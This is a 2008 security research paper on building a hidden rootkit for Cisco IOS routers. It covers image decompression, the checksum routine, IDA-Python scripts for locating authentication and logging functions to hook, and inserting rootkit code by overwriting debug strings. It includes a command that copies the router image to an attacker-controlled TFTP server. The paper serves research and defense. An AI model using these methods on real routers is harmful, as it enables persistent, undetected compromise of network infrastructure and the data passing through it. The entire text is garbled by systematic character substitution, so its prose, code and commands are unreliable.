CORE Security Technologies

Killing the myth of Cisco IOS rootkits:

DIK (Da Ios rootKit)
Sebastian 'topo' Muiz
May 2008
Abstract
Rootkits are ery co!!on in !ost operating syste!s" inclu#ing popular
$in#o%s" &inu' an# (ni' so)t%are" or any ariant o) those syste!s"
ho%eer they are rarely )oun# in e!be##e# OSes*
This is #ue to the )act that !ost o) the ti!e e!be##e# OSes hae
close# source co#e" %ith the internals o) the so)t%are unkno%n to the
public" !aking the reerse engineering process har#er than usual*
+n real li)e" it's ery co!!on that once an attacker takes control o)
a syste!" he or she %ill %ant to !aintain access to it" an# in an
atte!pt to keep those actions un#etecte# a rootkit %ill be installe#*
The rootkit seizes control o) the entire OS running on the
co!pro!ise# #eice by hi#ing )iles" processes an# net%ork
connections" an# allo%ing unauthorize# users to act as syste!
a#!inistrators ,, %hile retaining its stealth capabilities an# hi#ing
the attacker's presence*
This paper #e!onstrates that a rootkit %ith those characteristics can
easily be create# an# #eploye# )or a close# source OS like Cisco +OS
an# run hi##en )ro! syste! a#!inistrators suriing !ost" i) not all"
o) the security !easures that can be #eploye# by e'perts in the
)iel#*
-s a proo) o) this theory" seeral #i))erent techni.ues )or in)ecting
an +OS target %ill be #escribe#" inclu#ing i!age binary patching*
/ro! a practical point o) ie%" one o) these techni.ues %ill be
i!ple!ente# using a set o) 0ython123 scripts that proi#e the
necessary !etho#s to insert a generic rootkit i!ple!entation %ritten
in the C progra!!ing language,, calle# 4+5 64a +OS Rootkit7, into the
target +OS*
Page 1 of 37
Introduction
The case o) Cisco +OS 6)or!erly kno%n as the +nternet%ork Operating
Syste!7 is uni.ue because it is likely the !ost %i#ely #eploye#
routing OS running on the entire +nternet an# a )un#a!ental co!ponent
o) !ission critical net%orking operations in al!ost eery
organization*
8et%ork #eices are ital to those operations" an# sensitie #ata
)lo%s through the! eery secon#" !aking the! an e'tre!ely strategic
location )or attackers to place rootkits to gather in)or!ation )ro! a
target*
Syste! a#!inistrators nee# to be prepare# )or the e!ergence o) these
types o) threats because the attacks coul# lea# to serious e'ploits"
inclu#ing #ata breaches" be)ore they eer realize that so!ething is
going on*
Security !easures are typically un#ertaken to #etect any abnor!al
operations on Cisco #eices" but so!eti!es those !easures !ay not be
enough to #etect a#ance# rootkits* These e))orts !ay only uneil
high,leel rootkits such as a TC& script 6only recent ersions o) +OS
support TC& as a scripting language7" or #eice recon)iguration
e'ecute# ia startup,con)ig )ile to alter routes" packet han#ling"
etc* These high,leel rootkits are co!parable to user,!o#e rootkits
in general purpose operating syste!s such as $in#o%s" &inu' an# OS 9*
Only a s!all percentage o) all syste! a#!inistrators per)or! perio#ic
security au#its on their organizations: net%ork in)rastructure to
#etect )or potential syste! co!pro!ise*
These au#its !ay inclu#e 6but are not li!ite# to7 eri)ying router
logs" checking e'ternal logs that %ere set by the router %hen a user
logge#,in or change# the #eice:s con)iguration" or een by
#o%nloa#ing the running +OS i!age to co!pare its checksu! %ith a
preiously calculate# alue )ro! the original +OS i!age )ile*
To con#uct any o) these actions" the syste! a#!inistrator i!plicitly
relies on +OS internal )unctions an# trusts the integrity o) the
running +OS i!age* +) the #eice is co!pro!ise#" the logging an#
syslog )unctions can be altere# to coer the attacker's actions
!aking the au#it co!pletely useless*
Page 2 of 37
Knowing the enemy
Oer the years" Cisco has create# !ultiple har#%are con)igurations
6een using #i))erent C0( architectures ,, !ost co!!only 0o%er0C an#
M+0S7 %ith arie# so)t%are )eatures sets 6i*e*" %ireless" ;o+07 to
a##ress the nee#s o) its custo!ers*
This has re.uire# that the co!pany also !ake !ultiple an# uni.ue +OS
ersions aailable because each iteration #e!an#e# a separate buil#
process to a##ress the speci)ic )eature set running on the inole#
har#%are* The co!bination o) !ultiple har#%are plat)or!s an# )eature
sets has resulte# in the aailability o) seeral thousan#s o) uni.ue
+OS i!ages that coul# potentially run on a gien set o) #eices*
-nother i!portant )actor is that +OS %as not #esigne# to support
a##itional !o#ules or allo% )or plug,ins to be loa#e#*
$ith all this in !in#" an initial conclusion !ight be that the
#eelop!ent o) a generic rootkit that targets +OS !ight be too
#i))icult" i) not i!possible" to achiee*
<o%eer" this paper %ill #e!onstrate that this challenge can in )act
be easily sole# %ith a generic !etho# that a##resses the nee# to
!aintain co#e )or !ultiple architectures an# +OS )eature sets" or )or
progra!!ing the rootkit core in #i))erent asse!bly languages*
IOS Internals
Cisco +OS has a !onolithic architecture %hich runs as a single i!age
%ith all processes haing access to each other:s !e!ory*
8o !e!ory protection is i!ple!ente# bet%een processes" %hich !eans
that a bug in an in#ii#ual process can 6an# probably %ill7 corrupt
other processes an# co!pro!ise syste! operations" potentially lea#ing
to a general )ailure*
-nother characteristic o) the Cisco +OS is that its sche#uler
)unction is not pree!ptie" as its counterparts on other !o#ern OSes
%oul# be*
Cisco +OS uses run-to-completion priority scheduling" %hich is an
i!proe# /+/O 6/irst,+n" /irst,Out7 sche#uler" co!bine# %ith threa#
priorities* This !eans that %hen a process is sche#ule#" it runs
until it #eci#es to relinkish the associate# priilege an# !ake a
syste! call to allo% other processes to run on the sa!e priority
leel or higher*
Page 3 of 37
These high,priority processes can =u!p to the hea# o) the line an#
run .uickly on the C0(* +) !ultiple processes are %aiting %ith the
sa!e priority" they are processe# in the or#er in %hich they're
receie# 6=ust like basic /+/O7*
8e%er Cisco +OS i!ages are usually !a#e o) a >2,bit E&/ )ile running
on a piece o) har#%are %ith a R+SC processor 6!ost co!!only M+0S or
0o%er0C7*
+t's i!portant to note that Cisco engineers !o#i)ie# so!e o) the
alues )ro! a stan#ar# E&/ hea#er so that any tool trying to obtain
in)or!ation )ro! the )ile %ill )in# lots o) inali# alues" thus
!aking initial #iagnostic a little bit annoying*
0ossible i!age !o#i)ication techni.ues to obtain a ali# E&/ )ile
%ill be #iscusse# later an# also ho% this is achiee# by 4+5*
IOS initial setu on memory
This i!age contains a sel),#eco!pressing 6S/97 hea#er that unpacks
the )ully )unctional +OS co#e %hich %ill be relocate# in !e!ory
#uring run,ti!e*
+t is co!presse# because it contains !any strings that occupy
precious !e!ory" resources that are nee#e# !ore all the ti!e %ith the
continue# arrial o) ne%er +OS ersions %ith a##itional )eature sets*
+!age #eco!pression an# relocation inoles seeral steps %hich !ust
be un#erstoo# since the i!age #o%nloa#e# )ro! the #eice is not the
actual i!age that runs %hen the #eice is po%ere# on* -s preiously
note#" this is !erely a )ile that sel),#eco!presses at run,ti!e to
e'ecute the real +OS OS co#e* So" in or#er to place a back#oor the
unco!presse# i!age is nee#e#*
/or that reason" the co!presse# +OS i!age is the one that %ill be
!anipulate# )irst to unpack it's content" then analyze# as to )igure
out ho% to insert 6binary !o#i)y7 the back#oor an# )inally repack the
i!age to return in back to the #eice*
Repacking the i!age !eans that its checksu!s !ust be recalculate# to
re)lect the binary !anipulation that has been co!plete# so that it
can pass through initializing tests that %oul# )orbi# the !o#i)ie#
i!age )ro! running on the #eice %hen a ali# checksu! is not )oun#*
-n +OS co!presse# i!age has the )ollo%ing structure?
Page 4 of 37
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@
A E&/ hea#er A
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@
A S/9 co#e A
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ ,,@
A Magic 60'/EE4/-CE7 A A
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A
A Co!presse# i!age length A A
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A Magic
A Co!presse# i!age checksu! A A Structure
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A
A (nco!presse# i!age checksu! A A
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ A
A (nco!presse# i!age length A A
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@ ,,@
A A
A Co!presse# i!age A
A A
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@
The !agic structure is use# by the #eco!pression routine so that it
can obtain the alues nee#e# )or the #i))erent checksu!s that are
calculate# using the speci)ie# lengths e'presse# in %or#s 6B bytes7*
This !eans that i) the speci)ie# length is 202B" then the alue is?
202B %or#s ' B bytes per each %or# C B0DE bytes
This structure is also a pointer to the beginning o) the co!presse#
co#e*
Once the #eice po%ers on" it %ill start the ROM Monitor %hich %ill
per)or! seeral steps to loa# the +OS i!age an# %ill use the !agic
structure ele!ents #uring this process*
This process inoles seen steps?
2* The ROM Monitor %ill loa# an# position the S/9 i!age at its link
a##ress in !e!ory 6either )ro! a )lash boot or a netboot7 as the
E&/ hea#er speci)ies* This is %hen the i!age )ile is copie# )ro!
the )ile syste! to the #eice !e!ory an# the !ain routine is
inoke#*
2* 8o% the !agic structure is locate# using the alue o) a global
ariable calle# 'e#ata' that is initialize# by the ROM Monitor*
-t this point" this ariable points #irectly to the structure
containing the alues nee#e# to checksu! an# #eco!press the
i!age*
Page 5 of 37
>* The routine in the S/9 i!age then checks to ensure that enough
!e!ory is aailable )or #eco!pression using the alue o) the
)iel# 'unco!presse# i!age length' o) the !agic structure* +)
there is not enough !e!ory aailable" then the co#e returns to
the ROM Monitor %ith a so)t%are )orce reloa# signal a)ter
generating a !essage containing the te't?
FError ? !e!ory re.uire!ents e'cee# aailable !e!oryG*
-lso re!e!ber that the return to the !onitor is not inten#e# to
occur unless a reloa# %as initiate#*
B* - checksu! o) the co!presse# i!age is calculate# an# the result
is co!pare# against the alue store# in the )ile to ensure that
no corruption has occurre#* The checksu! algorith! is ery
si!ple an# %orks using the length )iel# alue 6either the
co!presse# or the unco!presse#7 )ro! the !agic structure*
The co#e that calculates the checksu! is si!ilar to the
)ollo%ing?
int n%or#s C co!presse#Hsize I sizeo)6ulong7J
unsigne# long su! C 0J II contains the checksu! result
unsigne# long al C 0J II te!porary alue
unsigne# charK bu)p C 6ucharK7 ptr4ataJ II pointer to
II #ata to eri)y
%hile 6n%or#s,,7 L
al C Kbu)p@@J
su! @C alJ
i) 6su! M al7 L IK There %as a carry KI
su!@@J
N
N
O* The co!presse# co#e is then !oe# to a higher !e!ory location
an# the PSS section is initialize# %ith zeros*
E* The #eco!pression process takes place* The #eco!presse# i!age is
also checksu!!e# to ensure there %as no corruption an# i) it
)ails" then a !essage containing the te't FError? unco!presse#
i!age checksu! is incorrectG is #isplaye#* -lso" the size o) the
#eco!presse# i!age is co!pare# against the alue store# in the
hea#er to ensure that %as co!pletely success)ul*
Q* (sing an internal )unction calle# copyHan#Hlaunch67" the co#e
relocation phase takes place !oing the i!age to the speci)ie#
Page 6 of 37
a##ress in the E&/ )ile hea#er so the i!age entry point is
calle#* +t's %orth !entioning that i) this call returns" then
FError? copyHan#Hlaunch67 returne#G is #isplaye#*
!he beginning of the end
The rootkit %ill locate certain key 6an# usually lo%,leel7 )unctions
o) the OS that is being co!pro!ise# to per)or! a binary patch an#
then hook the!*
These )unctions are strategic co#e locations that %ill allo% the
attacker to intercept #ata o) interest*
They coul# be groupe# by their )unctionality?
Syste! &ogin
-uthentication an# authorization
/ile syste! access
8et%orking operations
0rocess han#ling
+n)or!ation #isplay
Syste! &ogs
4ebugging an# core #u!ps
This paper %ill #e!onstrate ho% to i#enti)y only so!e o) those
)unctions because the i#enti)ication proce#ure is the sa!e )or all o)
the!*
+n the case o) a close# source OS like Cisco +OS" the )irst thing to
#o is i#enti)y the co#e that carries out the inole# )unctions*
+n or#er to per)or! an analysis" it is necessary to obtain the i!age
running on the target #eice* This can be easily #one by con)iguring
an /T0 or T/T0 serer on a !achine controlle# by an attacker" an#
then issuing a copy co!!an# on the Cisco #eice co!!an# line like the
)ollo%ing?
RouterR copy )lash?c2ED2,i,!z*22>,22*bin t)tp?II2Q2*2>*2*22Ic2ED2,i,!z*22>,22*bin
;eri)ying checksu! )or Sc2ED2,i,!z*22>,22*bin' 6)ile R 27***1O53
$riting test
TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT
TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT
TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT
TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT
Page 7 of 37
(ploa# to serer #one
/lash #eice copy took 00?00?08 1hh?!!?ss3
RouterR
$ith the target +OS i!age #o%nloa#e# it's no% possible to #eco!press
it an# then procee# to the analysis phase" !o#i)y the binary an#
in)ect it*
Though binary patching is not the only %ay to #o this" other possible
in)ection !etho#s %ill be e'plaine# later*
Chasing the rey
Once the )ile %as obtaine#" a )e% steps !ust be )ollo%e# to be able
to analyze the +OS i!age an# correctly #etect the preiously
!entione# )unctions?
2* -s preiously state#" the i!age insi#e the #eice is co!presse#"
so you !ust procee# to #eco!press it* The #eco!pression process
is the sa!e as )or any zippe# )ile so it's also possible to use
any )ree unzip utility to #o it* Once the i!age is unpacke# the
script %ill checksu! it to ensure that there %as no corruption*
2* The #eco!presse# i!age" calle# C2ED2,+,*P+8" !ust be analyze#
using +4- 0ro1>3 to obtain crucial in)or!ation )or the rootkit:s
surial* This can take seeral !inutes" een hours" because
unco!presse# +OS i!age )iles take up seeral !egabytes
6especially those ersions %ith a#ance# )eatures sets7*
>* Once +4- )inishes" the i!age %on't be co!pletely analyze#
because seeral )unctions an# !ultiple string re)erences %ill be
!issing* To a##ress this proble! another script %ill be use#* +t
utilizes +4-0ython1B3 to auto!ate the )unction an# string
recognition process*
The script per)or!s its task in a t%o phase process?
/irst it'll look )or kno%n seg!ents o) CO4E type an# iterate
oer eery instruction aligne# to a B byte !e!ory boun#ary*
+) the instruction is not actually part o) a )unction" then
the )unction is create# an# +4- takes care o) #etecting its
en#* The script then !oes to the instruction a)ter the en#
o) the preiously recognize# )unction an# tells +4- that this
Page 8 of 37
belongs to a )unction" an# so on* This is #one in +4-,0ython
%ith a script like this?
class Enhance#-nalysis?
RES(&THO5 C 0
RES(&THERR C 2
$-SHPRE-5 C 2
#e) HHinitHH6sel)7?
sel)*#ataHsegs C list67
sel)*co#eHsegs C list67
#e) create(nresole#/unctions6sel)7?
UUU
-nalyze the co#e section to )in# eery non,)unction byte an#
create a )unction at that position* This is highly reliable
because C+SCO co!piler creates one )unction a)ter another
an# eery instruction is aligne# to Bbytes because o) the
R+SC arch*
UUU
print '1@3 0rocessing CO4E seg!ents?'
R +terate through each co#e seg!ent aailable
)or seg in sel)*co#eHsegs?
currHa##ress C seg*startE-
counter C 0
initialH)uncsH.ty C getH)uncH.ty67
result C sel)*RES(&THO5
print ' -nalyzing V'WsV'***' W Seg8a!e6seg*startE-7"
R Start iteration on eery non,)unction byte until %e
R reach the en# o) the current %orking seg!ent*
%hile currHa##ress M seg*en#E-?
R +) 'cancel' button %as presse#" stop
R processing )unctions*
i) %asPreak67?
result C sel)*$-SHPRE-5
print 'Cancelle#'
return
R Xet the ne't a##ress that is not a )unction
R recognize# by +4-*
Page 9 of 37
ne'tHa##ressC)in#HnotH)unc6currHa##ress"SE-RC<H4O$87
i) ne'tHa##ress TC P-4-44R an# V
ne'tHa##ress TC 0'////////?
i) Make/unction6 ne'tHa##ress" P-4-44R 7 TC 0?
counter @C 2
currHa##ress C ne'tHa##ressJ
R Check i) %e reache# the en# o) the co#e seg!ent
i) getHite!Hsize6 currHa##ress 7 CC 0?
break
currHa##ress C getHite!Hen#6 currHa##ress 7
R 4etect an inali# ite! or )unction at the
R current position*
i) currHa##ress CC P-4-44R or V
currHa##ress CC 0'////////?
result C sel)*RES(&THERR
break
print '4one'
print '1@3 Create# a total o) W# ne% )unctions' W counter
return result
$ith )unctions correctly #etecte#" eery instruction aligne#
to a B byte !e!ory a##ress in 4-T- type seg!ents is then
iterate# to recognize eery string re)erence belonging to
those )unctions*
The script per)or!s a##itional checks to ensure that the
alues at the !e!ory a##ress being analyze# are a string"
instea# o) a re)erence 6pointer7 to it*
/or e'a!ple" in a case %here the 4-T- seg!ent begins at
0'Q0E20000" the script tries to #eter!ine i) the alue
0'Q2E2Q>Q> is the string FpassG or a re)erence to the !e!ory
a##ress %here a string coul# be store#*
8e't is a part o) the +4-,0ython script that per)or!s those
tasks?
Page 10 of 37
#e) create(nresole#Strings6sel)7?
UUU
This )unction conerts eery aligne# string into a +4-
string so that it can be re)erence# )ro! the #isasse!bly*
Pecause o) R+SC architecture eery string is aligne# to a B
byte boun#ary an# the rest o) ,unaligne#, the bytes until
the ne't string are pa##e# %ith zeros*
UUU
re)reshHstrlist60" 0'))))))))7
ne%HstrHcounter C 0 R ne% strings )oun# counter
print '1@3 0rocessing 4-T- seg!ents?'
R +terate through each co#e seg!ent aailable
)or seg in sel)*#ataHsegs?
currHa##ress C seg*startE-
initialHstrH.ty C getHstrlistH.ty67
print ' -nalyzing V'WsV'***' W Seg8a!e6seg*startE-7"
R Re!oe current area )or!at be)ore %e reanalize it*
sel)*un#e)ine-rea6currHa##ress" seg*en#E-7
%hile currHa##ress CC P-4-44R or currHa##ressMseg*en#E-?
R +) 'cancel' butto! %as presse#" stop
R processing strings*
i) %asPreak67?
print 'Cancelle#'
return
R Check eery B bytes 6>2 bits align!ent7
i) currHa##ress W B?
currHa##ress @C B , 6currHa##ress W B7
R Check i) this is a alue rea#y to be conerte#
R either to string or #%or#*
currHbyte C getHbyte6currHa##ress7
R +) %e )in# a printable or control character"
R probably it's a string*
i) 6currHbyte YC 0'20 an# currHbyte M 0'Q)7 or V
currHbyte CC 0'- or currHbyte CC 0'4 or V
currHbyte CC 0'D?
Page 11 of 37
R Pe)ore conerting it to a string or #%or#" %e
R check seg!ents a##ress space an# co!pare it
R %ith the B byte alue at the current a##ress
R being processe#*
R This %ay %e can #etect any o))set to a
R )unction or to a string or #ata in
R the sa!e seg!ent or a si!ple string array*
R
R E'a!ple? +t !ay happen that a string
R 'abc#' 60'E2E2E>EB7 is #etecte# as an
R o))set i) 0'E2999999 is a ali# seg!ent
R a##ress" so this %oul# be an error*
R To aoi# this + think %e shoul# not only check
R the )irst character but the other" too*
#%HcurrHa##ress C getHlong6currHa##ress7
)or co#eHseg in sel)*co#eHsegs?
co#eHsegHen#Hea C co#eHseg*en#E-
trans)or!Hto C ''
i) #%HcurrHa##ress TC 0'////////?
i) 66#%HcurrHa##ress YC seg*startE-7 V
an# 6#%HcurrHa##ress MC seg*en#E-77V
or V
66#%HcurrHa##ressYCco#eHseg*startE-7V
an# V
6#%HcurrHa##ress MC co#eHseg*en#E-77?
trans)or!Hto C '#%or#'
break R 4o not continue checking
else?
trans)or!Hto C 'string'
else?
trans)or!Hto C 'string'
else?
trans)or!Hto C '#%or#'
i) trans)or!Hto CC 'string'?
R $e #i# not use MakeStr because o) a bug in
R +4-0ython an# because %e can't set the
R >r# para!eter*
i) !akeHasciiHstring6currHa##ress" 0" -SCSTRHC7?
ne%HstrHcounter @C 2
else?
Make4%or#6currHa##ress7
Page 12 of 37
R Check i) %e reache# the en# o) the seg!ent
i) getHite!Hsize6 currHa##ress 7 CC 0?
break
currHa##ress C getHite!Hen#6 currHa##ress 7
print '4one'
R Report the nu!ber o) ne% strings )oun#
print '1@3 Conerte# W# strings' W ne%HstrHcounter
return result
-)ter a )e% !inutes" all strings that are not recognize# by +4-
0ro %ill be create# an# seeral ne% strings %ill be )oun#* The
)ollo%ing is the script's output to the +4- !essage console?
+nitiating enhance# C+SCO +OS analysis***
1@3 /oun# CO4E seg!ent '*te't' at 0'80008000
1@3 /oun# 4-T- seg!ent '*ro#ata' at 0'80CE-B2B
1@3 /oun# 4-T- seg!ent '*#ata' at 0'822BO-P0
1@3 /oun# 4-T- seg!ent '*s#ata' at 0'822->-/8
1@3 0rocessing CO4E seg!ents?
-nalyzing '*te't'*** 4one
1@3 Create# a total o) 2820B ne% )unctions
1@3 0rocessing 4-T- seg!ents?
-nalyzing '*ro#ata'*** 4one
-nalyzing '*#ata'*** 4one
-nalyzing '*s#ata'*** 4one
1@3 Conerte# 2QEQQ> strings
1@3 Enhance# analysis took Q*0> !inutes
-s you can see" once the script )inishes" the i!age is rea#y to use
an# can be e'a!ine# by the attacker to gain kno%le#ge o) Cisco +OS
internals using all the ne% in)or!ation ac.uire# by +4-*
Success)ul +OS i!age analysis is ery i!portant because it contains
plenty o) #ebugging strings to proi#e erbose in)or!ation to the
syste! a#!inistrator about the OS state* Those #ebug strings %ill be
use# as a starting point to #etect the key )unctions o) the OS an#
because it's kno%n )or sure that these strings re!ain the sa!e across
!ultiple +OS ersions*
Page 13 of 37
"esistance is futile
So!e o) those interesting )unctions !ight not be locate# because o)
co!piling issues or it !ight not be possible to retriee any string
re)erences in so!e cases si!ply because they #o not use any strings
at all*
-s state# be)ore" the +OS contains plenty o) strings" !ost o) %hich
o))er #ebugging in)or!ation" an# others that !erely output co!!only
seen !essages to the user ter!inal* These !essages can be locate# in
)unctions close to those that %e are looking )or" an#" kno%ing that
they %ill not be !oe# by the co!piler" it's possible to try to )in#
these 'neighbor' )unctions an# then i#enti)y the ones releant to the
rootkit )unctionality an# hook the!*
/unction reor#ering is co!!on on !o#ern co!pilers" but this is not
the case in the co!piler use# by Cisco so our approach is reliable in
this scenario* +4- 0ython %ill be use# to help us to locate the
necessary strings an# the co#e re)erences attache# to the!* /or this
purpose" a class %as create# insi#e o) the script that %ill per)or!
the binary patch* This class %ill take a list o) pre#e)ine# strings
an# %ill per)or! the search operation returning to a list o) cross,
re)erences 6+4-'s 're)s7 to those strings*
The !e!ory location re)erencing those strings is the !e!ory location
o) the inole# )unctions" so no% it's =ust a !atter o) asking +4-
about the beginning o) the )unction to kno% %here a =u!p to the
rootkit co#e can be inserte#*
The location o) neighbor )unctions is not necessarily i!!e#iate to
the one nee#e# )or the rootkit" there coul# be another )unction
%ithout any string re)erences separating the!" but this approach %ill
still succee#*
To illustrate the )unctions recognition !etho# a )unctions layout
%ill be sho%n ne't as an e'a!ple?
Page 14 of 37
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@
A neighborH!inusH2 A M, uses a uni.ue string*
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@
A neighborH!inusH2 A
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@
A A
A chkHpass A M, )unction o) interest
A A )or the rootkit
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@
A neighborHplusH2 A
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@
A neighborHplusH2 A
@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@
+n the case that the )unction chkHpass67 #oesn't contain any string
but the )unction neighborHplus267 #oes" the )ollo%ing steps !ust be
acco!plishe# to locate the chkHpass67 )unction?
2* +terate through the list o) strings on +4- to search )or the
strings re)erence# by )unction neighborHplus267* +n +4-,0ython
this can be #one by a si!ple )unction like this?
#e) )uncString6stringHtoH)in#7?
UUU/unction to )in# the speci)ie# string a!ong allUUU
R Re)resh the list o) +4- strings
re)reshHstrlist60" 0'////////7
R Store in)or!ation about the speci)ie# string
stringHin)o C stringHin)oHt67
R +terate through eery string aailable
)or i in range6getHstrlistH.ty677?
R Xet the current string ite! to co!pare against the list
getHstrlistHite!6i" stringHin)o7
i) len6stringHtoH)in#7 CC stringHin)o*length?
R /oun# )lag
stringH!iss!atch C /alse
R Pyte,to,byte co!parison is .uicker that entire string
)or = in range6stringHin)o*length7?
i) or#6stringHtoH)in#1=37 TC Pyte6stringHin)o*ea@=7?
stringH!iss!atch C True
Page 15 of 37
R return string a##ress
i) stringH!iss!atch CC /alse?
return stringHin)o*ea
return 0 R string not )oun#
2* Obtain a list o) eery #ata re)erence 6+4- calls it '#re)' ,, a
re)erence to a #ata in the speci)ie# !e!ory a##ress7 to the
string use# to i#enti)y the )unction chkHpass67 %ith the
)ollo%ing co#e?
#e) get4ataRe)s6stringHa##ress7?
R Store the list o) #ata re)erences to the speci)ie# string
stringH#re)s C list67
re) C getH)irstH#re)Hto6stringHa##ress7
%hile re) TC P-4-44R?
R Check i) list is e!pty to aoi# )urther ali#ations
i) len6stringH#re)s7?
R Check i) preious re) is the sa!e*
R E'planation is in the te't bello% TTT
i) 6stringH#re)s1,23 @ B7 CC re)?
continue
else?
R -## the )irst re)erence to the list
stringH#re)s*appen#6re)7
stringH#re)s*appen#6re)7
re) C getHne'tH#re)Hto6stringHa##ress" re)7
return stringH#re)s
5eep in !in# that in R+SC architectures the !e!ory re)erence
alues are loa#e# using t%o instructions because a >2,bit !e!ory
a##ress cannot be re)erence# #irectly using only B byte
instructions* This %ay t%o #ata re)erences %ill be issue# 6one
to re)er to the upper 2 bytes" an# another )or the lo%er 2
bytes7 that still belong to the sa!e source co#e*
4ue to the )act that the co!piler puts those t%o instructions
together" a check is issue# to eri)y i) the last appen#e#
re)erence# a##ress" plus B" is e.ual to the current re)erence*
+t %ill happen that +4- %ill #etect &- 6&oa# -##ress7 !acro
Page 16 of 37
instruction in M+0S* 4o not con)use this %ith 0o%er0C &- 6&oa#
-##ress7 instruction" %hich is a !acro )or the -44+ instruction*
-n e'a!ple o) string pointer loa# on 0o%er0C #isasse!bly
)ollo%s?
*te't?802C>Q40 lis WrE" a;eri)y0assZh R U;eri)y passU
*te't?802C>Q4B a##i WrE" WrE" a;eri)y0assZl R U;eri)y passU
The &+S 6&oa# +!!e#iate Shi)te#7 loa#s the upper 2 bytes o) the
!e!ory a##ress o) the string in register RE %hile the
instruction -44+ 6-## +!!e#iate7 loa#s the lo%er 2 bytes to RE*
8o% the register contains the !e!ory a##ress o) the string*

+n an +OS i!age running on M+0S architecture" the )ollo%ing
#isasse!bly co#e is obtaine#?
*te't?E020208B la [a>" a;eri)y0ass R U;eri)y passU
The &- 6&oa# -##ress7 !acro instruction is recognize# by +4- but
it is not a real instruction because it's a !acro %rapping the
)ollo%ing co#e?
*te't?E020208B lui [a>" 0'E228 R U;eri)y passUZh
*te't?E0202088 a##iu [a>" 0'Q>>B R U;eri)y passUZl
The )irst instruction is &(+ 6&oa# (pper +!!e#iate7 an# loa#s
the 2 upper bytes into register -> an# then the instruction
-44+( 6-## +!!e#iate (nsigne#7 a##s the 2 lo%er bytes !aking
register -> a pointer to the !e!ory a##ress containing the
string*
>* 8o% the !e!ory a##ress containing the co#e that re)erences the
string in )unction neighborH!inusH267 is kno%n* +t's also kno%n
that the )unction chkHpass67 is t%o )unctions a%ay )ro! the
)unction neighborH!inusH267 so it can be resole# easily using
+4-,0ython?
R 're)H)oun# contains the a##ress o) the co#e re)erencing
R the string that %as preiously obtaine#*
)nHneighborH!inusH2 C getH)unc6're)H)oun#7
)nHneighborH!inusH2 C getHne'tH)unc6)nHneighborH!inusH2*startE-7
)nHchkHpass C getHne'tH)unc6)nHneighborH!inusH2*startE-7
Page 17 of 37
)irstHinstHa##ress C )nHchkHpass*startE-
$ith those easy steps" the !e!ory a##ress o) the )irst instruction
pointing to the )unction prologue %ill be obtaine#*
The )unction prologue %ill be replace# by a hook to =u!p to our co#e
but this %ill be e'plaine# in #etail later*
-lso note that the neighbor )unction coul# be locate# at any #istance
or )ro! any #irection 6be)ore or a)ter7 )ro! the )unction chkHpass67
so this approach %ill still %ork because the co!piler puts one
)unction a)ter another as #eclare# in the source co#e*
#ome sweet home
The rootkit location !ust be #eci#e# be)ore any i!age patching takes
place 6%hether it is on the )ile or at run,ti!e7 because the patches
applie# at the beginning o) eery )unction %ill =u!p to the rootkit
co#e an# they !ust kno% its !e!ory location*
Taking a#antage o) +OS !e!ory !anage!ent protection 6or the lack o)
it7 rootkit co#e %ill be %ritten on the 4-T- seg!ent by sacri)icing a
#ebug string %hich %ill al!ost probably neer be use#* Cisco +OS has
plenty o) these strings an# !ost o) the! are co!!on along seeral
ersions 6i) not all7*
\ust in case the syste! a#!inistrator #eci#es to use so!e +OS )eature
that re.uires that string" a 8(&& character %ill be %ritten at the
)irst character to aoi# string #isplaying proble!s an# also to aoi#
user suspicion* To )in# a speci)ic string" re)er to the preious
section %ere +4-,0ython is use# )or this purpose*
There are seeral %ays to insert the rootkit co#e in the )ile an#
they are all %ell kno%n )or any &inu' irus %riter because it's
!ainly a stan#ar# E&/ in)ection proce#ure1O31E3*
/or e'a!ple" kno%ing that eery E&/ section is aligne# to a !e!ory
page size" one possible techni.ue is to use the unuse# space bet%een
sections* This re.uires section length !o#i)ications on the E&/
hea#er but this is easy to achiee*
-nother %ay to in)ect the i!age is a##ing ne% sections at the en# o)
the )ile" but this re.uires e'tensie E&/ hea#er an# sections hea#er
table !o#i)ications*
Page 18 of 37
8o #etaile# e'planation %ill be gien about those techni.ues" an#
only )or the sake o) clarity is it !entione# that oer%riting an
e'isting string resource in the )ile is the !etho# chosen because it
#oesn't re.uire any E&/ hea#er !anipulations*
This !etho# is the easiest in this case because +OS i!ages contain
ery long strings that are rarely use# an# there is no nee# to !o#i)y
the E&/ hea#er alues because eery section an# seg!ent re!ains the
sa!e* The #o%nsi#e o) this !etho# is that it re.uires a bigger
)ootprint because o) the sacri)ice o) #ebug strings %hich coul#
co!pro!ise our rootkit presence on the syste!*
-s !entione# at the beginning o) the paper" the rootkit core %ill be
i!ple!ente# in plain C so %e !ust co!pile the rootkit an# e'tract
)ro! it the )unctions %hich per)or! the tasks nee#e# ,, %ithout the
%hole i!age hea#ers 6%e %ill probably setup XCC1Q3 to cross,
co!pile183 to 0o%er0C,E&/ or to M+0S,E&/" so E&/ )ile hea#ers !ust be
aoi#e#7*
-)ter e'tracting the rootkit co#e )ro! the resulting )ile" a chunk o)
bytes %ill be obtaine# an# this is the co#e that %ill be %ritten oer
the selecte# string" but this %ill be coere# in #etail later*
